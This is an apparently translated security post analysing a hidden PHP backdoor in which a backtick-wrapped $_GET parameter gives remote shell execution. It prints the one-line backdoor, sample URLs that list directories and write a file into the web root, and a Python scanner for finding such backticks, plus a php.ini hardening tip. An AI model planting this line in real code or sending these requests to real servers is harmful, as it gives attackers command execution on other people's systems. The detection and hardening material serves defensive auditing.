Analysis of a hard-to-spot PHP backdoor

I came across a piece of code by accident that looks harmless at first glance, but it is in fact a fatal backdoor. It uses the backtick (`), a character that most PHP developers pay little attention to. A string enclosed in backticks is equivalent to a call to the shell_exec function.
The disguise is good, and administrators can easily overlook it.
$selfNums = $_GET['R']; if (isset($selfNums)) { echo `$selfNums`; }
On seeing this code, I think most people would say there is no problem, but careful readers will notice that the variable after echo is wrapped in a symbol. Since it is a variable, why wrap it at all? And the symbol is not a single quotation mark. This is the key point: the symbol is the backtick, the key below Esc (next to the exclamation-mark key).
echo `system command`; achieves the same effect as system();
If you do not believe it, you can test it.
http://127.0.0.1/t.php?R=dir (lists directories)
http://127.0.0.1/t.php?R=echo I am Ma er>D:\web\90sec.php
I have successfully tested this on AppServ and in the VM.
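To audit a code base for this pattern, a reviewer can flag every backtick operator that sits in PHP code context while ignoring backticks inside quoted strings, comments and inline HTML. The Python scanner below is an added example, not code from the original post; the name find_backtick_exec and the sample input are constructed here, and heredoc/nowdoc bodies are not modelled, so a backtick inside one would still be reported.

```python
import re

# One alternation that consumes the PHP constructs in which a backtick is
# inert (quoted strings, comments) before it can be mistaken for the operator.
TOKEN = re.compile(r"""
    (?P<sq>'(?:\\.|[^'\\])*')             # single-quoted string
  | (?P<dq>"(?:\\.|[^"\\])*")             # double-quoted string
  | (?P<lc>(?://|\#).*?(?=\n|\?>|\Z))     # line comment (also ends at ?>)
  | (?P<bc>/\*.*?\*/)                     # block comment
  | (?P<bt>`(?:\\.|[^`\\])*`)             # backtick operator = shell_exec()
  | (?P<close>\?>)                        # back to inline HTML
""", re.S | re.X)

def find_backtick_exec(src):
    """Return (line, command, has_variable) for each backtick operator in PHP code."""
    hits, pos = [], 0
    while (start := src.find("<?", pos)) != -1:   # skip inline HTML
        pos = start + 2
        while (m := TOKEN.search(src, pos)):
            pos = m.end()
            if m.lastgroup == "close":
                break
            if m.lastgroup == "bt":
                cmd = m.group("bt")[1:-1]
                line = src.count("\n", 0, m.start()) + 1
                # A "$" means the command is built from a variable: review first.
                hits.append((line, cmd, "$" in cmd))
        else:
            break   # end of file reached while still inside PHP
    return hits

# Constructed sample: the snippet from the article plus three decoys
# (inline HTML, a comment, and a SQL string that uses backticks).
SAMPLE = """<html><p>Use `ls` to list files</p>
<?php
// legacy note: `whoami` is not run here
$sql = 'SELECT `id` FROM `users`';
$selfNums = $_GET['R'];
if (isset($selfNums)) { echo `$selfNums`; }
?>
"""

if __name__ == "__main__":
    for line, cmd, tainted in find_backtick_exec(SAMPLE):
        print(f"line {line}: backtick exec {cmd!r} variable={tainted}")
```

Where shell execution is not needed at all, listing shell_exec in disable_functions in php.ini also disables the backtick operator.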